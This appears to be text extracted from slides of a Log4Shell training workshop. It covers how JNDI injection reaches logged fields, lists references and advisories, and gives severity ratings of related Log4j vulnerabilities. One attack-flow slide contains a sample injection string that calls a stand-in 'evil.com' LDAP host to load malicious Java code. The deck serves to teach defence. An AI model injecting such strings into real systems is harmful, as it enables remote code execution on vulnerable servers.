The document provides an overview of the Log4Shell vulnerability and its impact, detailing how it can be exploited through JNDI injection. It references various sources including blogs and alerts about the associated risks and vulnerabilities over time. It also lists severity ratings of multiple vulnerabilities related to the Log4j library published between December 2021 and August 2022.

4. https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html

5. https://blog.qualys.com/vulnerabilities-threat-research/2022/03/18/infographic-log4shell-vulnerability-impact-by-the-numbers

9. Library
Direct
Dependency
Indirect
Dependency
Indirect
Dependency
Indirect
Dependency
Direct
Dependency
Indirect
Dependency

10. Credit: https://twitter.com/GossiTheDog/status/1469252646745874435

11. Whatever you are logging!
• User-Agent
• X-Headers
• Body of the Request
• Etc.

12. Local or Remote
Database

13. :8080
:1389
:8888
$(jndi:ldap://evil.com/badstuff)
Malicious JNDI String
1
External Query
LDAP (or DNS/RMI)
2
Pointer (redirect) to 2nd request
Server Response
3
Malicious Java classes and code
2nd Response
5
2nd Request
HTTP(S)
4

14. JNDI Initialization
Protocol
Attacker’s Infrastructure
Payload

22. (09 Nov 2022)

23. https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/

25. https://www.cisa.gov/uscert/ncas/alerts/aa22-174a

31. Software Bill of Materials (SBOM)

34. Proprietary and confidential
Questions?
• www.devaultsecurity.com
• linkedin.
• twitter. devaultsecurity.com
• github.
• brandon-devault@pluralsight.com
• https://github.com/Oofles/Log4j-workshop
• https://app.pluralsight.com/profile/author/brandon-devault
}

36. 10 - Critical
Pub: 12/10/2021
Upd: 08/17/2022

37. 9.0 - Critical
Pub: 12/14/2021
Upd: 07/25/2022

38. 5.9 - Medium
Pub: 12/18/2021
Upd: 07/25/2022

39. 6.6 - Medium
Pub: 12/28/2021
Upd: 08/08/2022

40. 5.3 - Medium
Pub: 01/01/2022
Upd: 02/10/2022

41. 9.8 - Critical
Pub: 01/14/2022
Upd: 08/08/2022

42. 5.5 - Medium
Pub: 01/19/2022
Upd: 01/27/2022

43. 9.8 - Critical
Pub: 02/20/2022
Upd: 02/28/2022

44. 7.2 - High
Pub: 04/13/2022
Upd: 04/21/2022

45. 8.8 - High
Pub: 04/19/2022
Upd: 05/11/2022

46. 8.8 - High
Pub: 04/19/2022
Upd: 05/03/2022

47. 7.0 - High
Pub: 06/17/2022
Upd: 07/05/2022

48. 8.1 - High
Pub: 08/24/2022
Upd: 08/29/2022